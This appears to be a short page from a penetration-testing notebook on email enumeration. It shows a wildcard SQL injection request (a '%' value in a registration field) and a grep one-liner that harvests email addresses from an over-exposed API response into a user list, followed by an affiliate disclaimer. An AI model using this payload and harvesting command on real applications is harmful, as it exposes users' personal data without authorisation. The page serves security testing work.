Email Enumeration

Wildcard SQLI

POST /registration HTTP/2 
Host: domain 
Content-Type: application/json;charset=UTF-8  

{"userEmail":"%"}

Use Wildcard (LIKE Clause) SQLi to enumerate

Excessive data exposure

grep -oe "[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+" response.json > users.list

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated